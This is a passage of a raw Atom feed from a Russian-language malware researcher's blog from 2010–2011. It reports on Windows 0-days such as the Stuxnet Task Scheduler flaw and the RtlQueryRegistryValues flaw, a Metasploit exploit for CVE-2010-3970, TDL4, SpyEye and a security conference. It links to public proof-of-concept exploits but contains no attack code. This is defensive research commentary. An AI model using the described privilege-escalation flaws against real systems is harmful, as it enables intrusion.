src='https://blogger.googleusercontent.com/tracker/2182101645168532490-5906657520956550762?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/5906657520956550762/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/01/teamviewer.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5906657520956550762'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5906657520956550762'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/01/teamviewer.html' title='TeamViewer, как компонент бэкдора'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gn-7ejyJv08/TTC_ncFn1yI/AAAAAAAAAxI/VL1fORpp1qI/s72-c/admin_panel.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8722971195256553983</id><published>2011-01-11T20:35:00.002+03:00</published><updated>2011-01-12T00:52:28.909+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>0-day для Graphics Rendering Engine</title><content type='html'>Интересный &lt;a href="https://www.metasploit.com/redmine/projects/framework/repository/revisions/11466/entry/modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb"&gt;эксплойт&lt;/a&gt; появился на метасплойте в начале января для &lt;a href="http://www.microsoft.com/technet/security/advisory/2490606.mspx"&gt;CVE-2010-3970&lt;/a&gt;. Началось все с двух товарищей Moti Joseph &amp;amp; Xu Hao, которые поведали миру о переполнении стека при отображении thumbnails файлов на конференции &lt;a href="http://www.powerofcommunity.net/"&gt;POC2010&lt;/a&gt; в середине декабря (&lt;a href="http://www.exploit-db.com/download_pdf/15899"&gt;слайды&lt;/a&gt;).&lt;br&gt;&lt;br&gt;&lt;object height="340" width="560"&gt;&lt;param name="movie" value="http://www.youtube.com/v/_G7Xbx2wSkI?fs=1&amp;amp;hl=ru_RU"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/_G7Xbx2wSkI?fs=1&amp;amp;hl=ru_RU" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br&gt;&lt;br&gt;&lt;a href="http://amatrosov.blogspot.com/2011/01/0-day-graphics-rendering-engine.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8722971195256553983?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8722971195256553983/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/01/0-day-graphics-rendering-engine.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8722971195256553983'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8722971195256553983'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/01/0-day-graphics-rendering-engine.html' title='0-day для Graphics Rendering Engine'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-6350914685018876968</id><published>2010-12-20T20:48:00.001+03:00</published><updated>2010-12-20T20:49:08.463+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Adobe'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>На выходных пришло интересное спам сообщение ...</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_gn-7ejyJv08/TQ-R11T79AI/AAAAAAAAAwY/pVDW132qJEI/s1600/image001.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="138" src="http://4.bp.blogspot.com/_gn-7ejyJv08/TQ-R11T79AI/AAAAAAAAAwY/pVDW132qJEI/s400/image001.jpg" width="400"&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2010/12/blog-post.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-6350914685018876968?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/6350914685018876968/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/12/blog-post.html#comment-form' title='Комментарии: 3'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6350914685018876968'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6350914685018876968'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/12/blog-post.html' title='На выходных пришло интересное спам сообщение ...'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_gn-7ejyJv08/TQ-R11T79AI/AAAAAAAAAwY/pVDW132qJEI/s72-c/image001.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8331991214158162987</id><published>2010-12-15T17:40:00.003+03:00</published><updated>2010-12-15T17:51:02.100+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Дождались или уязвимость в Task Scheduler закрыта</title><content type='html'>Не прошло и нескольких месяцев, как вчера вышел &lt;a href="http://www.microsoft.com/technet/security/bulletin/MS10-092.mspx"&gt;MS10-092&lt;/a&gt;, закрывающий &lt;a href="http://amatrosov.blogspot.com/2010/11/stuxnet-under-microscope-revision-12.html"&gt;последний 0-day&lt;/a&gt;, эксплуатирующийся червем Stuxnet для повышения привилегий до уровня системы на осях Vista/Win7. &lt;br /&gt;Что интересно эта уязвимость стала эксплуатироваться руткитом &lt;a href="http://amatrosov.blogspot.com/search/label/TDL4"&gt;TDL4&lt;/a&gt; с конца ноября для инсталляции на системы Vista/Win7.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TQjOSNqra5I/AAAAAAAAAwA/8wuXWSzHNNo/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="18" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TQjOSNqra5I/AAAAAAAAAwA/8wuXWSzHNNo/s400/1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_gn-7ejyJv08/TQjOWTuMsKI/AAAAAAAAAwE/u_Apof1vuuc/s1600/5243798358_7c933253ba_z.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="145" src="http://2.bp.blogspot.com/_gn-7ejyJv08/TQjOWTuMsKI/AAAAAAAAAwE/u_Apof1vuuc/s400/5243798358_7c933253ba_z.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Где-то в конце ноября появился публичный &lt;a href="http://amatrosov.blogspot.com/2010/11/0-day-ms.html"&gt;эксплойт&lt;/a&gt;&amp;nbsp;и примерно через несколько дней мы обнаружили первые экземпляры TDL4, эксплуатирующие&amp;nbsp;эту уязвимость. Возможно эти события никак и не взаимосвязаны, т.к. в CANVAS рабочий сплойт попал на много раньше, да и в принципе уже многие его расковыряли сами в тельце Stuxnet. Кстати уязвимость эксплуатируется достаточно просто и код получается универсальным и для x86 систем, и для x64.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Что стало наиболее приятным для меня во всей этой эпопее с сотрудничеством с MS, нас таки отметили в списке с благодарностями:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TQjSCudJG5I/AAAAAAAAAwI/KO1RsxiSeT4/s1600/team.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="10" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TQjSCudJG5I/AAAAAAAAAwI/KO1RsxiSeT4/s400/team.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Но в принципе, иначе и быть не могло, т.к. мы единственные кто предоставили рабочий PoC код еще в сентябре, а не только описание уязвимости.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;MS10-92 - это не единственная уязвимость закрытая вчера и с полном списком можно ознакомиться &lt;a href="http://habrahabr.ru/blogs/infosecurity/110032/"&gt;здесь&lt;/a&gt;.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8331991214158162987?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8331991214158162987/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/12/task-scheduler.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8331991214158162987'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8331991214158162987'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/12/task-scheduler.html' title='Дождались или уязвимость в Task Scheduler закрыта'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/TQjOSNqra5I/AAAAAAAAAwA/8wuXWSzHNNo/s72-c/1.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-797087628198157457</id><published>2010-11-28T16:19:00.002+03:00</published><updated>2010-11-28T16:22:24.579+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Два 0-day, о которых пока молчит MS</title><content type='html'>На прошлой неделе был опубликован &lt;a href="http://www.exploit-db.com/exploits/15609/"&gt;PoC&lt;/a&gt; на интересный 0-day, суть которого заключается в недостаточном контроле входных параметров функции &lt;a href="http://msdn.microsoft.com/en-us/library/ff562046(VS.85).aspx"&gt;RtlQueryRegistryValues()&lt;/a&gt; в итоге получаем классическое переполнение стека в ядре и права SYSTEM у нас в руках. Эксплуатировать уязвимость достаточно просто,т.к. в ядре нет различных препятствий мешающих эксплуатации, как в пользовательском режиме. Не буду тут подробно описывать эту уязвимость, так как все уже &lt;a href="http://habrahabr.ru/blogs/infosecurity/108903/#habracut"&gt;есть&lt;/a&gt;. &lt;br /&gt;&lt;br /&gt;Второй интересной новостью стало появление публичного &lt;a href="http://www.exploit-db.com/exploits/15589/"&gt;PoC&lt;/a&gt; для уязвимости в &lt;a href="http://amatrosov.blogspot.com/2010/11/stuxnet-under-microscope-revision-12.html"&gt;Task Scheduler&lt;/a&gt;, которая была обнаружена в коде червя Stuxnet и известна уже как минимум с конца лета (с этого же времени MS тоже в курсе).&lt;br /&gt;&lt;br /&gt;Обе эти уязвимости прекрасно работают на большинстве распространенных версий винды и позволяют повысить локальные привилегии до SYSTEM в обход UAC. Но кроме бюллетеней CERT, пока нет официальных бюллетеней со стороны MS, в прочем и дат по их закрытию тоже. А злоумышленники тем временем имеют вполне себе неплохие инструменты для "тихой" инсталляции всякого зверья.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-797087628198157457?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/797087628198157457/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/11/0-day-ms.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/797087628198157457'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/797087628198157457'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/11/0-day-ms.html' title='Два 0-day, о которых пока молчит MS'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1830512815327883561</id><published>2010-11-28T15:46:00.001+03:00</published><updated>2010-11-28T15:47:05.635+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Альтернативный GUI для Metasploit в стиле Canvas</title><content type='html'>Наткнулся сегодня на интересный проект &lt;a href="http://www.fastandeasyhacking.com/"&gt;Armitage&lt;/a&gt;, целью которого является замена оригинального GUI для Metasploit. На первый взляд мне все понравилось, правда заметно, что при реализации Armitage позаимствован ряд идей из Immunity Canvas. Посмотрим, как дальше будет развиваться проект, но для старта вполне плохо.  &lt;br&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.fastandeasyhacking.com/images/screenshots/armitage4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="311" src="http://www.fastandeasyhacking.com/images/screenshots/armitage4.png" width="400"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2010/11/gui-metasploit-canvas.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1830512815327883561?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1830512815327883561/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/11/gui-metasploit-canvas.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1830512815327883561'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1830512815327883561'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/11/gui-metasploit-canvas.html' title='Альтернативный GUI для Metasploit в стиле Canvas'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-7543180040844261462</id><published>2010-11-24T20:25:00.002+03:00</published><updated>2010-11-24T20:29:05.559+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><title type='text'>Впечатления от поездки на AVAR'2010</title><content type='html'>Началось мое путешествие вечером 14 ноября, мне предстояло совершить перелет с двумя пересадками и в общей сложности это должно было занять около 26 часов. Летел я арабскими авиалиниями &lt;a href="http://www.qatarairways.com/splash.html?linkdes_0"&gt;Qatar&lt;/a&gt;, которые произвели на меня очень приятное впечатление. Выглядел мой путь следующим образом: Домодедово-&amp;gt;Доха-&amp;gt;Сингапур-&amp;gt;Денпасар. &lt;br&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_gn-7ejyJv08/TO1AvgGodhI/AAAAAAAAAvg/zrqVttgFehc/s1600/map.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="308" src="http://4.bp.blogspot.com/_gn-7ejyJv08/TO1AvgGodhI/AAAAAAAAAvg/zrqVttgFehc/s400/map.PNG" width="400"&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2010/11/avar2010_24.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-7543180040844261462?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/7543180040844261462/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/11/avar2010_24.html#comment-form' title='Комментарии: 3'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7543180040844261462'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7543180040844261462'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/11/avar2010_24.html' title='Впечатления от поездки на AVAR&apos;2010'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_gn-7ejyJv08/TO1AvgGodhI/AAAAAAAAAvg/zrqVttgFehc/s72-c/map.PNG' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8310617515926313554</id><published>2010-11-13T17:54:00.000+03:00</published><updated>2011-10-19T15:35:30.146+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='SCADA'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyberwar'/><title type='text'>SCADA и Stuxnet</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Не так давно я уже выкладывал &lt;a href="http://amatrosov.blogspot.com/2010/10/another-report-about-stuxnet.html"&gt;ролик &lt;/a&gt;с демонстрацией того, что делает Stuxnet при модификациях вносимых им в параметры SCADA системы. Правда он был в плохом качестве и был заснят одним из посетителей VB'2010 на мобильный телефон. Разобрать, что там происходит на самом деле было достаточно проблематично и вот наконец авторы того доклада решили обновить свою видео &lt;a href="http://www.symantec.com/connect/blogs/stuxnet-breakthrough"&gt;демонстрацию&lt;/a&gt; и на этот раз уже с преферансом и блудницами :) &lt;br /&gt;&lt;br /&gt;&lt;object height="340" width="560"&gt;&lt;param name="movie" value="http://www.youtube.com/v/cf0jlzVCyOI?fs=1&amp;amp;hl=ru_RU"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/cf0jlzVCyOI?fs=1&amp;amp;hl=ru_RU" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8310617515926313554?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8310617515926313554/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/11/scada-stuxnet.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8310617515926313554'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8310617515926313554'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/11/scada-stuxnet.html' title='SCADA и Stuxnet'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-737933493179645602</id><published>2010-11-12T00:36:00.000+03:00</published><updated>2010-11-12T00:36:38.746+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><title type='text'>AVAR'2010</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;На следующей недели состоится довольно любопытное мероприятие &lt;a href="http://www.aavar.org/"&gt;AVAR'2010&lt;/a&gt; (Association of anti Virus Asia Researchers). В этот раз конференция состоится в интересном месте, а точнее на Бали и слетать туда само по себе приятно, а тут еще и можно дополнительную пользу извлечь от поездки в виде интересных докладов.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TNxeX73T4OI/AAAAAAAAAvQ/l0ZkZ8iEAoA/s1600/banner_full.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TNxeX73T4OI/AAAAAAAAAvQ/l0ZkZ8iEAoA/s1600/banner_full.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://www.aavar.org/avar2010/program.html"&gt;Программа&lt;/a&gt; довольно насыщена, в общем я в предвкушении мероприятия. Ждите отчет а ближайшее время ;)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-737933493179645602?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/737933493179645602/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/11/avar2010.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/737933493179645602'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/737933493179645602'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/11/avar2010.html' title='AVAR&apos;2010'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/TNxeX73T4OI/AAAAAAAAAvQ/l0ZkZ8iEAoA/s72-c/banner_full.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1038401229746015467</id><published>2010-11-10T20:03:00.000+03:00</published><updated>2010-11-10T20:03:21.146+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='SpyEye'/><category scheme='http://www.blogger.com/atom/ns#' term='Zeus'/><title type='text'>SpyEye все больше привлекает внимания</title><content type='html'>Где-то около недели назад была опубликована интересная статистика по активности троянца SpyEye, эти &lt;a href="http://blog.damballa.com/?p=951"&gt;материалы &lt;/a&gt;были опубликованы в блоге компании&amp;nbsp;&lt;a href="http://damballa.com/"&gt;Damballa&lt;/a&gt;.&amp;nbsp;Интересно, что пока лидерами по количеству активных админок являются, Украина и Чехия.&lt;div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TNrNnFUGVFI/AAAAAAAAAvM/orV9caVK3OY/s1600/spy_img5.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="198" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TNrNnFUGVFI/AAAAAAAAAvM/orV9caVK3OY/s400/spy_img5.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Сейчас&amp;nbsp;SpyEye набирает все большую&amp;nbsp;популярность, как crimeware в и определенных кругах у него есть все шансы окончательно добить Зевса, который пока еще не хочет сдаваться. С точки зрения технологий SpyEye опережает Зевса, хотя во многом функционал у двух этих семейств повторяется. Кстати не так давно начал сою работу &lt;a href="https://spyeyetracker.abuse.ch/"&gt;SpyEye Tracker&lt;/a&gt;&amp;nbsp;(пока не очень много отслеживаемых C&amp;amp;C), который во многом повторяет &lt;a href="https://zeustracker.abuse.ch/index.php"&gt;ZeuS Tracker&lt;/a&gt;, но авторы обещаю интересные&amp;nbsp;нововведения.&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1038401229746015467?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1038401229746015467/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/11/spyeye.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1038401229746015467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1038401229746015467'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/11/spyeye.html' title='SpyEye все больше привлекает внимания'/><author><name>Aleks 